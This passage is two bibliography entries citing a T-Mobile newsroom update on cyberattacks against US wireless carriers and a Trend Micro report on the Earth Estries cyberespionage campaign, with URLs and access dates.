[12] “An Update on Recent Cyberattacks Targeting the US Wireless Companies,” T-Mobile Newsroom. Available: https://www.t-mobile.com/news/un-carrier/update-cyberattacks-targeting-us-wireless-companies. [Accessed: Dec. 19, 2024]
[13] “Earth Estries Targets Government, Tech for Cyberespionage,” Trend Micro, Aug. 30, 2023. Available: https://www.trendmicro.com/en_in/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html. [Accessed: Dec. 19, 2024]